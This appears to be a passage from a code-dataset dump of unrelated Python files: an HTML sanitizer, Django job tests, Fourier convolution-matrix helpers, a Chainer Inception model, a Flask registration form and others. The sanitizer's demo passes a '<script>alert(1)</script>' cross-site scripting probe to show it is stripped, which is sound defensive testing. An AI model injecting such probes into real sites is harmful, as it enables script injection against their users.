ALLOWED_IMG_PATTERN = re.compile(
r'^(<img\ssrc="(https?://|/)[-A-Za-z0-9+&@#/%?=~_|!:,.;\(\)]+"(\swidth="\d{1,3}")?'
r'(\sheight="\d{1,3}")?(\salt="[^"<>]*")?(\stitle="[^"<>]*")?\s?/?>)$'
)
def _sanitize_tag(match):
"""Return the tag if it is allowed or the empty string otherwise"""
tag = match.group(0)
if (
ALLOWED_BASIC_TAG_PATTERN.match(tag) or
ALLOWED_A_PATTERN.match(tag) or
ALLOWED_IMG_PATTERN.match(tag)
):
return tag
else:
return ""
def _sanitize_html(source):
"""
Return source with all non-allowed tags removed, preserving the text content
"""
return TAG_PATTERN.sub(_sanitize_tag, source)
def _remove_unpaired_tags(source):
"""
Return source with all unpaired tags removed, preserving the text content
source should have already been sanitized
"""
tag_matches = list(SANITIZED_TAG_PATTERN.finditer(source))
if not tag_matches:
return source
tag_stack = []
tag_name_stack = []
text_stack = [source[:tag_matches[0].start()]]
for i, match in enumerate(tag_matches):
tag_name = match.group(2)
following_text = (
source[match.end():tag_matches[i + 1].start()] if i + 1 < len(tag_matches) else
source[match.end():]
)
if tag_name in ["p", "img", "br", "li", "hr"]: # tags that don't require closing
text_stack[-1] += match.group(0) + following_text
elif match.group(1): # end tag
if tag_name in tag_name_stack: # paired with a start tag somewhere
# pop tags until we find the matching one, keeping the non-tag text
while True:
popped_tag_name = tag_name_stack.pop()
popped_tag = tag_stack.pop()
popped_text = text_stack.pop()
if popped_tag_name == tag_name:
text_stack[-1] += popped_tag + popped_text + match.group(0)
break
else:
text_stack[-1] += popped_text
# else unpaired; drop the tag
text_stack[-1] += following_text
else: # start tag
tag_stack.append(match.group(0))
tag_name_stack.append(tag_name)
text_stack.append(following_text)
return "".join(text_stack)
def render_body(raw_body):
"""
Render raw_body to HTML.
This includes the following steps:
* Convert Markdown to HTML
* Strip non-whitelisted HTML
* Remove unbalanced HTML tags
Note that this does not prevent Markdown syntax inside a MathJax block from
being processed, which the forums JavaScript code does.
"""
rendered = markdown.markdown(raw_body)
rendered = _sanitize_html(rendered)
rendered = _remove_unpaired_tags(rendered)
return rendered
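# A short illustrative round trip through render_body (not part of the module):
if __name__ == "__main__":
    raw = "**bold** <script>alert(1)</script> <b>kept</b> <i>unclosed"
    print(render_body(raw))
    # The Markdown emphasis becomes <strong>, the <script> tags are stripped by
    # _sanitize_html (the inner text survives), and the unpaired <i> start tag
    # is dropped by _remove_unpaired_tags while the text "unclosed" is kept.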
|
StarcoderdataPython
|
5034476
|
from django.test import TestCase
from django.conf import settings
import json
import time
import os
from newt.tests import MyTestClient, newt_base_url, login
try:
from newt.local_settings import test_machine as machine
except ImportError:
machine = "localhost"
class JobTests(TestCase):
fixtures = ["test_fixture.json"]
def setUp(self):
self.client = MyTestClient()
self.client.post(newt_base_url + "/auth", data=login)
def test_get_queues(self):
# Tests getting queues
r = self.client.get(newt_base_url + "/job/")
self.assertEquals(r.status_code, 200)
json_response = r.json()
self.assertTrue(len(json_response['output']) > 0)
self.assertIn(machine, json_response['output'].keys())
def test_running_cmds(self):
# Tests submitting a job
payload = {
"jobscript": "/bin/hostname\nsleep 10"
}
r = self.client.post(newt_base_url + "/job/"+machine+"/", data=payload)
self.assertEquals(r.status_code, 200)
json_response = r.json()
self.assertIsNot(json_response['output']['jobid'], None)
# Get job id from submitting the job
job_id = json_response['output']['jobid']
# Give the process time to register
time.sleep(1)
# Tests getting job info
r = self.client.get(newt_base_url + "/job/"+machine+"/%s/" % job_id)
self.assertEquals(r.status_code, 200)
json_response = r.json()
self.assertEquals(json_response['output']['jobid'], job_id)
self.assertEquals(json_response['output']['user'], login['username'])
# Delete job from queue
r = self.client.delete(newt_base_url + "/job/"+machine+"/%s/" % job_id)
self.assertEquals(r.status_code, 200)
|
StarcoderdataPython
|
384567
|
import numpy as np
def convmat2D(A, P, Q):
'''
:param A: input is currently whatever the real space representation of the structure is
:param P: Pspecifies max order in x (so the sum is from -P to P
:param Q: specifies max order in y (so the sum is from -Q to Q
:return:
'''
N = A.shape;
NH = (2*P+1) * (2*Q+1) ;
    p = list(range(-P, P + 1)); #array of size 2P+1
q = list(range(-Q, Q + 1));
## do fft
Af = (1 / np.prod(N)) * np.fft.fftshift(np.fft.fft2(A));
# natural question is to ask what does Af consist of..., what is the normalization for?
## NOTE: indexing error; N[0] actually corresponds to y and N[1] corresponds to x.
# central indices marking the (0,0) order
p0 = int((N[1] / 2)); #Af grid is Nx, Ny
q0 = int((N[0] / 2)); #no +1 offset or anything needed because the array is orders from -P to P
C = np.zeros((NH, NH))
C = C.astype(complex);
for qrow in range(2*Q+1): #remember indices in the arrary are only POSITIVE
for prow in range(2*P+1): #outer sum
# first term locates z plane, 2nd locates y column, prow locates x
row = (qrow) * (2*P+1) + prow; #natural indexing
for qcol in range(2*Q+1): #inner sum
for pcol in range(2*P+1):
col = (qcol) * (2*P+1) + pcol; #natural indexing
pfft = p[prow] - p[pcol]; #get index in Af; #index may be negative.
qfft = q[qrow] - q[qcol];
C[row, col] = Af[q0 + pfft, p0 + qfft]; #index may be negative.
return C;
def convmat2D_o(A, P, Q):
'''
:param A: input is currently whatever the real space representation of the structure is
    :param P: specifies the total number of orders in x
    :param Q: specifies the total number of orders in y
    :return: the (P*Q) x (P*Q) convolution matrix C
'''
N = A.shape;
NH = P*Q ;
p = list(range(-int(P/2), int(P/2) + 1));
q = list(range(-int(Q/2), int(Q/2) + 1));
## do fft
Af = (1 / np.prod(N)) * np.fft.fftshift(np.fft.fftn(A));
# natural question is to ask what does Af consist of..., what is the normalization for?
# central indices marking the (0,0) order
p0 = int(np.floor(N[0] / 2)); #Af grid is Nx, Ny
q0 = int(np.floor(N[1] / 2)); #we have to do minus 1 because indices are from 0 to N-1 for N element arrays
C = np.zeros((NH, NH))
C = C.astype(complex);
for qrow in range(Q): #remember indices in the arrary are only POSITIVE
for prow in range(P): #outer sum
# first term locates z plane, 2nd locates y column, prow locates x
row = (qrow) * (P) + prow; #natural indexing
for qcol in range(Q): #inner sum
for pcol in range(P):
col = (qcol) * (P) + pcol; #natural indexing
pfft = p[prow] - p[pcol];
qfft = q[qrow] - q[qcol];
C[row, col] = Af[p0 + pfft, q0 + qfft];
return C;
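# Minimal usage sketch (illustrative): build the convolution matrix of a simple
# binary grating and check its size, which is (2P+1)(2Q+1) on each side.
if __name__ == "__main__":
    Nx, Ny = 512, 512
    eps_r = np.ones((Ny, Nx))
    eps_r[:, : Nx // 2] = 9.0   # half of the unit cell has a higher permittivity
    P, Q = 3, 3
    E_conv = convmat2D(eps_r, P, Q)
    print(E_conv.shape)         # -> (49, 49) for P = Q = 3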
|
StarcoderdataPython
|
11314010
|
<gh_stars>10-100
#Modified from https://github.com/hvy/chainer-inception-score
import math
import chainer
from chainer import Chain
from chainer import functions as F
from chainer import links as L
from chainer import Variable
from chainer.functions.activation.relu import ReLU
from chainer.functions.pooling.average_pooling_2d import AveragePooling2D
from chainer.functions.pooling.max_pooling_2d import MaxPooling2D
class Mixed(Chain):
def __init__(self, trunk):
super().__init__()
for name, link in trunk:
self.add_link(name, link)
self.trunk = trunk
def __call__(self, x):
hs = []
#print(type(x))
for name, f in self.trunk:
if not name.startswith('_'):
if 'bn' in name:
h = getattr(self, name)(x)
else:
h = getattr(self, name)(x)
else:
h = f.apply((x,))[0]
hs.append(h)
return F.concat(hs)
class Tower(Chain):
def __init__(self, trunk):
super().__init__()
for name, link in trunk:
if not name.startswith('_'):
self.add_link(name, link)
self.trunk = trunk
def __call__(self, x):
h = x
for name, f in self.trunk:
if not name.startswith('_'): # Link
if 'bn' in name:
h = getattr(self, name)(h)
else:
h = getattr(self, name)(h)
else: # AveragePooling2D, MaxPooling2D or ReLU
h = f.apply((h,))[0]
return h
class Inception(Chain):
def __init__(self):
super().__init__(
conv=L.Convolution2D(3, 32, 3, stride=2, pad=0),
conv_1=L.Convolution2D(32, 32, 3, stride=1, pad=0),
conv_2=L.Convolution2D(32, 64, 3, stride=1, pad=1),
conv_3=L.Convolution2D(64, 80, 1, stride=1, pad=0),
conv_4=L.Convolution2D(80, 192, 3, stride=1, pad=0),
bn_conv=L.BatchNormalization(32),
bn_conv_1=L.BatchNormalization(32),
bn_conv_2=L.BatchNormalization(64),
bn_conv_3=L.BatchNormalization(80),
bn_conv_4=L.BatchNormalization(192),
mixed=Mixed([
('conv', Tower([
('conv', L.Convolution2D(192, 64, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(64)),
('_relu', ReLU())
])),
('tower', Tower([
('conv', L.Convolution2D(192, 48, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(48)),
('_relu', ReLU()),
('conv_1', L.Convolution2D(48, 64, 5, stride=1, pad=2)),
('bn_conv_1', L.BatchNormalization(64)),
('_relu_1', ReLU())
])),
('tower_1', Tower([
('conv', L.Convolution2D(192, 64, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(64)),
('_relu', ReLU()),
('conv_1', L.Convolution2D(64, 96, 3, stride=1, pad=1)),
('bn_conv_1', L.BatchNormalization(96)),
('_relu_1', ReLU()),
('conv_2', L.Convolution2D(96, 96, 3, stride=1, pad=1)),
('bn_conv_2', L.BatchNormalization(96)),
('_relu_2', ReLU())
])),
('tower_2', Tower([
('_pooling', AveragePooling2D(3,1,pad=1)),
('conv', L.Convolution2D(192, 32, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(32)),
('_relu', ReLU())
]))
]),
mixed_1=Mixed([
('conv', Tower([
('conv', L.Convolution2D(256, 64, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(64)),
('_relu', ReLU())
])),
('tower', Tower([
('conv', L.Convolution2D(256, 48, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(48)),
('_relu', ReLU()),
('conv_1', L.Convolution2D(48, 64, 5, stride=1, pad=2)),
('bn_conv_1', L.BatchNormalization(64)),
('_relu_1', ReLU())
])),
('tower_1', Tower([
('conv', L.Convolution2D(256, 64, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(64)),
('_relu', ReLU()),
('conv_1', L.Convolution2D(64, 96, 3, stride=1, pad=1)),
('bn_conv_1', L.BatchNormalization(96)),
('_relu_1', ReLU()),
('conv_2', L.Convolution2D(96, 96, 3, stride=1, pad=1)),
('bn_conv_2', L.BatchNormalization(96)),
('_relu_2', ReLU())
])),
('tower_2', Tower([
('_pooling', AveragePooling2D(3,1,pad=1)),
('conv', L.Convolution2D(256, 64, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(64)),
('_relu', ReLU())
]))
]),
mixed_2=Mixed([
('conv', Tower([
('conv', L.Convolution2D(288, 64, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(64)),
('_relu', ReLU())
])),
('tower', Tower([
('conv', L.Convolution2D(288, 48, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(48)),
('_relu', ReLU()),
('conv_1', L.Convolution2D(48, 64, 5, stride=1, pad=2)),
('bn_conv_1', L.BatchNormalization(64)),
('_relu_1', ReLU())
])),
('tower_1', Tower([
('conv', L.Convolution2D(288, 64, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(64)),
('_relu', ReLU()),
('conv_1', L.Convolution2D(64, 96, 3, stride=1, pad=1)),
('bn_conv_1', L.BatchNormalization(96)),
('_relu_1', ReLU()),
('conv_2', L.Convolution2D(96, 96, 3, stride=1, pad=1)),
('bn_conv_2', L.BatchNormalization(96)),
('_relu_2', ReLU())
])),
('tower_2', Tower([
('_pooling', AveragePooling2D(3,1,pad=1)),
('conv', L.Convolution2D(288, 64, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(64)),
('_relu', ReLU())
]))
]),
mixed_3=Mixed([
('conv', Tower([
('conv', L.Convolution2D(288, 384, 3, stride=2, pad=0)),
('bn_conv', L.BatchNormalization(384)),
('_relu', ReLU())
])),
('tower', Tower([
('conv', L.Convolution2D(288, 64, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(64)),
('_relu', ReLU()),
('conv_1', L.Convolution2D(64, 96, 3, stride=1, pad=1)),
('bn_conv_1', L.BatchNormalization(96)),
('_relu_1', ReLU()),
('conv_2', L.Convolution2D(96, 96, 3, stride=2, pad=0)),
('bn_conv_2', L.BatchNormalization(96)),
('_relu_2', ReLU())
])),
('pool', Tower([
('_pooling', MaxPooling2D(3, 2, pad=0))
]))
]),
mixed_4=Mixed([
('conv', Tower([
('conv', L.Convolution2D(768, 192, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(192)),
('_relu', ReLU())
])),
('tower', Tower([
('conv', L.Convolution2D(768, 128, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(128)),
('_relu', ReLU()),
('conv_1', L.Convolution2D(128, 128, (1, 7), stride=1, pad=(0, 3))),
('bn_conv_1', L.BatchNormalization(128)),
('_relu_1', ReLU()),
('conv_2', L.Convolution2D(128, 192, (7, 1), stride=1, pad=(3, 0))),
('bn_conv_2', L.BatchNormalization(192)),
('_relu_2', ReLU())
])),
('tower_1', Tower([
('conv', L.Convolution2D(768, 128, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(128)),
('_relu', ReLU()),
('conv_1', L.Convolution2D(128, 128, (7, 1), stride=1, pad=(3, 0))),
('bn_conv_1', L.BatchNormalization(128)),
('_relu_1', ReLU()),
('conv_2', L.Convolution2D(128, 128, (1, 7), stride=1, pad=(0, 3))),
('bn_conv_2', L.BatchNormalization(128)),
('_relu_2', ReLU()),
('conv_3', L.Convolution2D(128, 128, (7, 1), stride=1, pad=(3, 0))),
('bn_conv_3', L.BatchNormalization(128)),
('_relu_3', ReLU()),
('conv_4', L.Convolution2D(128, 192, (1, 7), stride=1, pad=(0, 3))),
('bn_conv_4', L.BatchNormalization(192)),
('_relu_4', ReLU())
])),
('tower_2', Tower([
('_pooling', AveragePooling2D(3,1,pad=1)),
('conv', L.Convolution2D(768, 192, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(192)),
('_relu', ReLU())
]))
]),
mixed_5=Mixed([
('conv', Tower([
('conv', L.Convolution2D(768, 192, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(192)),
('_relu', ReLU())
])),
('tower', Tower([
('conv', L.Convolution2D(768, 160, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(160)),
('_relu', ReLU()),
('conv_1', L.Convolution2D(160, 160, (1, 7), stride=1, pad=(0, 3))),
('bn_conv_1', L.BatchNormalization(160)),
('_relu_1', ReLU()),
('conv_2', L.Convolution2D(160, 192, (7, 1), stride=1, pad=(3, 0))),
('bn_conv_2', L.BatchNormalization(192)),
('_relu_2', ReLU())
])),
('tower_1', Tower([
('conv', L.Convolution2D(768, 160, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(160)),
('_relu', ReLU()),
('conv_1', L.Convolution2D(160, 160, (7, 1), stride=1, pad=(3, 0))),
('bn_conv_1', L.BatchNormalization(160)),
('_relu_1', ReLU()),
('conv_2', L.Convolution2D(160, 160, (1, 7), stride=1, pad=(0, 3))),
('bn_conv_2', L.BatchNormalization(160)),
('_relu_2', ReLU()),
('conv_3', L.Convolution2D(160, 160, (7, 1), stride=1, pad=(3, 0))),
('bn_conv_3', L.BatchNormalization(160)),
('_relu_3', ReLU()),
('conv_4', L.Convolution2D(160, 192, (1, 7), stride=1, pad=(0, 3))),
('bn_conv_4', L.BatchNormalization(192)),
('_relu_4', ReLU())
])),
('tower_2', Tower([
('_pooling', AveragePooling2D(3,1,pad=1)),
('conv', L.Convolution2D(768, 192, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(192)),
('_relu', ReLU())
]))
]),
mixed_6=Mixed([
('conv', Tower([
('conv', L.Convolution2D(768, 192, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(192)),
('_relu', ReLU())
])),
('tower', Tower([
('conv', L.Convolution2D(768, 160, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(160)),
('_relu', ReLU()),
('conv_1', L.Convolution2D(160, 160, (1, 7), stride=1, pad=(0, 3))),
('bn_conv_1', L.BatchNormalization(160)),
('_relu_1', ReLU()),
('conv_2', L.Convolution2D(160, 192, (7, 1), stride=1, pad=(3, 0))),
('bn_conv_2', L.BatchNormalization(192)),
('_relu_2', ReLU())
])),
('tower_1', Tower([
('conv', L.Convolution2D(768, 160, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(160)),
('_relu', ReLU()),
('conv_1', L.Convolution2D(160, 160, (7, 1), stride=1, pad=(3, 0))),
('bn_conv_1', L.BatchNormalization(160)),
('_relu_1', ReLU()),
('conv_2', L.Convolution2D(160, 160, (1, 7), stride=1, pad=(0, 3))),
('bn_conv_2', L.BatchNormalization(160)),
('_relu_2', ReLU()),
('conv_3', L.Convolution2D(160, 160, (7, 1), stride=1, pad=(3, 0))),
('bn_conv_3', L.BatchNormalization(160)),
('_relu_3', ReLU()),
('conv_4', L.Convolution2D(160, 192, (1, 7), stride=1, pad=(0, 3))),
('bn_conv_4', L.BatchNormalization(192)),
('_relu_4', ReLU())
])),
('tower_2', Tower([
('_pooling', AveragePooling2D(3,1,pad=1)),
('conv', L.Convolution2D(768, 192, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(192)),
('_relu', ReLU())
]))
]),
mixed_7=Mixed([
('conv', Tower([
('conv', L.Convolution2D(768, 192, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(192)),
('_relu', ReLU())
])),
('tower', Tower([
('conv', L.Convolution2D(768, 192, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(192)),
('_relu', ReLU()),
('conv_1', L.Convolution2D(192, 192, (1, 7), stride=1, pad=(0, 3))),
('bn_conv_1', L.BatchNormalization(192)),
('_relu_1', ReLU()),
('conv_2', L.Convolution2D(192, 192, (7, 1), stride=1, pad=(3, 0))),
('bn_conv_2', L.BatchNormalization(192)),
('_relu_2', ReLU())
])),
('tower_1', Tower([
('conv', L.Convolution2D(768, 192, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(192)),
('_relu', ReLU()),
('conv_1', L.Convolution2D(192, 192, (7, 1), stride=1, pad=(3, 0))),
('bn_conv_1', L.BatchNormalization(192)),
('_relu_1', ReLU()),
('conv_2', L.Convolution2D(192, 192, (1, 7), stride=1, pad=(0, 3))),
('bn_conv_2', L.BatchNormalization(192)),
('_relu_2', ReLU()),
('conv_3', L.Convolution2D(192, 192, (7, 1), stride=1, pad=(3, 0))),
('bn_conv_3', L.BatchNormalization(192)),
('_relu_3', ReLU()),
('conv_4', L.Convolution2D(192, 192, (1, 7), stride=1, pad=(0, 3))),
('bn_conv_4', L.BatchNormalization(192)),
('_relu_4', ReLU())
])),
('tower_2', Tower([
('_pooling', AveragePooling2D(3,1,pad=1)),
('conv', L.Convolution2D(768, 192, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(192)),
('_relu', ReLU())
]))
]),
mixed_8=Mixed([
('tower', Tower([
('conv', L.Convolution2D(768, 192, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(192)),
('_relu', ReLU()),
('conv_1', L.Convolution2D(192, 320, 3, stride=2, pad=0)),
('bn_conv_1', L.BatchNormalization(320)),
('_relu_1', ReLU())
])),
('tower_1', Tower([
('conv', L.Convolution2D(768, 192, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(192)),
('_relu', ReLU()),
('conv_1', L.Convolution2D(192, 192, (1, 7), stride=1, pad=(0, 3))),
('bn_conv_1', L.BatchNormalization(192)),
('_relu_1', ReLU()),
('conv_2', L.Convolution2D(192, 192, (7, 1), stride=1, pad=(3, 0))),
('bn_conv_2', L.BatchNormalization(192)),
('_relu_2', ReLU()),
('conv_3', L.Convolution2D(192, 192, 3, stride=2, pad=0)),
('bn_conv_3', L.BatchNormalization(192)),
('_relu_3', ReLU())
])),
('pool', Tower([
('_pooling', MaxPooling2D(3, 2, pad=0))
]))
]),
mixed_9=Mixed([
('conv', Tower([
('conv', L.Convolution2D(1280, 320, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(320)),
('_relu', ReLU()),
])),
('tower', Tower([
('conv', L.Convolution2D(1280, 384, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(384)),
('_relu', ReLU()),
('mixed', Mixed([
('conv', Tower([
('conv', L.Convolution2D(384, 384, (1, 3), stride=1, pad=(0, 1))),
('bn_conv', L.BatchNormalization(384)),
('_relu', ReLU()),
])),
('conv_1', Tower([
('conv_1', L.Convolution2D(384, 384, (3, 1), stride=1, pad=(1, 0))),
('bn_conv_1', L.BatchNormalization(384)),
('_relu_1', ReLU()),
]))
]))
])),
('tower_1', Tower([
('conv', L.Convolution2D(1280, 448, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(448)),
('_relu', ReLU()),
('conv_1', L.Convolution2D(448, 384, 3, stride=1, pad=1)),
('bn_conv_1', L.BatchNormalization(384)),
('_relu_1', ReLU()),
('mixed', Mixed([
('conv', Tower([
('conv', L.Convolution2D(384, 384, (1, 3), stride=1, pad=(0, 1))),
('bn_conv', L.BatchNormalization(384)),
('_relu', ReLU()),
])),
('conv_1', Tower([
('conv_1', L.Convolution2D(384, 384, (3, 1), stride=1, pad=(1, 0))),
('bn_conv_1', L.BatchNormalization(384)),
('_relu_1', ReLU()),
]))
]))
])),
('tower_2', Tower([
('_pooling', AveragePooling2D(3,1,pad=1)),
('conv', L.Convolution2D(1280, 192, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(192)),
('_relu', ReLU())
]))
]),
mixed_10=Mixed([
('conv', Tower([
('conv', L.Convolution2D(2048, 320, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(320)),
('_relu', ReLU()),
])),
('tower', Tower([
('conv', L.Convolution2D(2048, 384, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(384)),
('_relu', ReLU()),
('mixed', Mixed([
('conv', Tower([
('conv', L.Convolution2D(384, 384, (1, 3), stride=1, pad=(0, 1))),
('bn_conv', L.BatchNormalization(384)),
('_relu', ReLU()),
])),
('conv_1', Tower([
('conv_1', L.Convolution2D(384, 384, (3, 1), stride=1, pad=(1, 0))),
('bn_conv_1', L.BatchNormalization(384)),
('_relu_1', ReLU()),
]))
]))
])),
('tower_1', Tower([
('conv', L.Convolution2D(2048, 448, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(448)),
('_relu', ReLU()),
('conv_1', L.Convolution2D(448, 384, 3, stride=1, pad=1)),
('bn_conv_1', L.BatchNormalization(384)),
('_relu_1', ReLU()),
('mixed', Mixed([
('conv', Tower([
('conv', L.Convolution2D(384, 384, (1, 3), stride=1, pad=(0, 1))),
('bn_conv', L.BatchNormalization(384)),
('_relu', ReLU())
])),
('conv_1', Tower([
('conv_1', L.Convolution2D(384, 384, (3, 1), stride=1, pad=(1, 0))),
('bn_conv_1', L.BatchNormalization(384)),
('_relu_1', ReLU())
]))
]))
])),
('tower_2', Tower([
('_pooling', MaxPooling2D(3, 1, pad=1)),
('conv', L.Convolution2D(2048, 192, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(192)),
('_relu', ReLU())
]))
]),
logit=L.Linear(2048, 1008)
)
def __call__(self, x, get_feature=False, scaled=False, resize=False):
"""Input dims are (batch_size, 3, 299, 299)."""
if resize:
x = F.resize_images(x, (299, 299))
if scaled:
x = (x+1)*127.5
# assert x.shape[1:] == (3, 299, 299)
x -= 128.0
x *= 0.0078125
h = F.relu(self.bn_conv(self.conv(x)))
# assert h.shape[1:] == (32, 149, 149)
h = F.relu(self.bn_conv_1(self.conv_1(h)))
# assert h.shape[1:] == (32, 147, 147)
h = F.relu(self.bn_conv_2(self.conv_2(h)))
# assert h.shape[1:] == (64, 147, 147)
h = F.max_pooling_2d(h, 3, stride=2, pad=0)
# assert h.shape[1:] == (64, 73, 73)
h = F.relu(self.bn_conv_3(self.conv_3(h)))
# assert h.shape[1:] == (80, 73, 73)
h = F.relu(self.bn_conv_4(self.conv_4(h)))
# assert h.shape[1:] == (192, 71, 71)
h = F.max_pooling_2d(h, 3, stride=2, pad=0)
# assert h.shape[1:] == (192, 35, 35)
h = self.mixed(h)
# assert h.shape[1:] == (256, 35, 35)
h = self.mixed_1(h)
# assert h.shape[1:] == (288, 35, 35)
h = self.mixed_2(h)
# assert h.shape[1:] == (288, 35, 35)
h = self.mixed_3(h)
# assert h.shape[1:] == (768, 17, 17)
h = self.mixed_4(h)
# assert h.shape[1:] == (768, 17, 17)
h = self.mixed_5(h)
# assert h.shape[1:] == (768, 17, 17)
h = self.mixed_6(h)
# assert h.shape[1:] == (768, 17, 17)
h = self.mixed_7(h)
# assert h.shape[1:] == (768, 17, 17)
h = self.mixed_8(h)
# assert h.shape[1:] == (1280, 8, 8)
h = self.mixed_9(h)
# assert h.shape[1:] == (2048, 8, 8)
h = self.mixed_10(h)
# assert h.shape[1:] == (2048, 8, 8)
h = F.average_pooling_2d(h, 8, 1)
# assert h.shape[1:] == (2048, 1, 1)
h = F.reshape(h, (-1, 2048))
if get_feature:
return h
else:
h = self.logit(h)
h = F.softmax(h)
# assert h.shape[1:] == (1008,)
return h
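# Usage sketch (hedged: the enclosing chain/class is defined above this excerpt, so
# `model` below stands in for an instance of it; input layout is NCHW float32):
#     import numpy as np
#     x = np.zeros((1, 3, 299, 299), dtype=np.float32)
#     probs = model(x)                      # softmax over 1008 classes
#     feats = model(x, get_feature=True)    # 2048-d pooled features
#     probs2 = model(x, resize=True)        # other input sizes are resized to 299x299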
|
StarcoderdataPython
|
4967967
|
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
__pkginfo__ = {}
with open("jinsi/__pkginfo__.py") as fh:
exec(fh.read(), __pkginfo__)
class Info:
version = __pkginfo__.get("version", None)
setuptools.setup(
name="jinsi",
version=Info.version,
author="<NAME>",
author_email="<EMAIL>",
description="JSON/YAML homoiconic templating language",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/scravy/jinsi",
scripts=[
"bin/jinsi"
],
packages=setuptools.find_packages(),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
python_requires='>=3.7',
install_requires=[
'awesome-pattern-matching>=0.20.1',
'pyyaml>=5.0.0',
],
)
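# Build/install sketch (standard setuptools workflow, nothing project-specific assumed):
#     pip install .             # install jinsi and its declared dependencies
#     python setup.py sdist     # build a source distribution into dist/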
|
StarcoderdataPython
|
19039
|
<reponame>webguru001/Python-Django-Web<filename>Francisco_Trujillo/Assignments/registration/serverre.py
from flask import Flask, render_template, request, redirect, session, flash
import re
EMAIL_REGEX = re.compile(r'^[a-zA-Z0-9.+_-]+@[a-zA-Z0-9._-]+\.[a-zA-Z]+$')
app = Flask(__name__)
app.secret_key = 'irtndvieurnviur'
@app.route('/')
def index():
return render_template("index.html")
# check that all fields are filled in and both passwords are at least 8 characters
def checkForValuelength(form):
    if (len(form['email']) < 1 or
            len(form['fname']) < 1 or
            len(form['lname']) < 1 or
            len(form['password']) < 8 or
            len(form['cpassword']) < 8):
return False
return True
# check for valid name and last name
def validNameFields(form):
if not form['fname'].isalpha() or not form['lname'].isalpha():
return False
return True
# check that password and confirmation match
def matchPassword(form):
if not form['password'] == form['cpassword']:
return False
return True
@app.route('/process', methods=['POST'])
def form_page():
    if not checkForValuelength(request.form):
        flash("All fields are required and the password must be 8 or more characters")
        return redirect('/')
    elif not validNameFields(request.form):
        flash("First and last name must not contain numbers")
        return redirect('/')
    elif not EMAIL_REGEX.match(request.form['email']):
        flash("Invalid Email address")
        return redirect('/')
    elif not matchPassword(request.form):
        flash("Passwords do not match")
        return redirect('/')
    flash("Form successfully submitted")
return redirect('/')
@app.route('/')
def result_page():
return redirect('/')
app.run(debug=True)
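# Manual test sketch (assumes the server is running locally on Flask's default port 5000;
# the field names match the form handled by /process above, values are placeholders):
#     curl -X POST http://localhost:5000/process \
#          -d "email=ada@example.com" -d "fname=Ada" -d "lname=Lovelace" \
#          -d "password=<PASSWORD>" -d "cpassword=<PASSWORD>"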
|
StarcoderdataPython
|
5175794
|
<filename>2nd/generate_1m_numbers.py
# <NAME>,Tzu-Heng's Work
# generate a file with 1,000,000 numbers
# Mailto: <EMAIL>
# Github: github.com/lzhbrian
# Linkedin: linkedin/in/lzhbrian
import random
fp = open('./Numbers.txt','w')
length = 1000000
min_x = 0
max_x = 60000
count = 0
for x in xrange(0,length):
print >> fp, (random.uniform(min_x, max_x))
count += 1
print "Suc. print ", count, " numbers"
|
StarcoderdataPython
|
1658189
|
from typing import Callable
import numpy as np
from .Wavelet import Wavelet
from .WaveletHelper import inverse_transform
class AbstractWaveletInverseTransform(object):
def __init__(self,
wavelet: Wavelet):
self.wavelet = wavelet
def transform(self,
build_matrix: Callable[[int], np.array]) -> np.array:
work_image = self.wavelet.get()
height, width = work_image.shape
transform_h_matrix: np.array = build_matrix(width)
transform_v_matrix: np.array = build_matrix(height)
return inverse_transform(
input_image=work_image,
transform_h_matrix=transform_h_matrix,
transform_v_matrix=transform_v_matrix)
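# Usage sketch (hedged: `wavelet` is assumed to be a Wavelet instance whose get() returns
# a 2-D array; any callable mapping a size n to an (n, n) transform matrix can be used):
#     itx = AbstractWaveletInverseTransform(wavelet)
#     restored = itx.transform(build_matrix=lambda n: np.eye(n))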
|
StarcoderdataPython
|
1732368
|
from base64 import b64encode
from tornado_http_auth import DigestAuthMixin, BasicAuthMixin, auth_required
from tornado.testing import AsyncHTTPTestCase
from tornado.web import Application, RequestHandler
credentials = {
'user1': '<PASSWORD>',
'user2': '<PASSWORD>',
}
class BasicAuthHandler(BasicAuthMixin, RequestHandler):
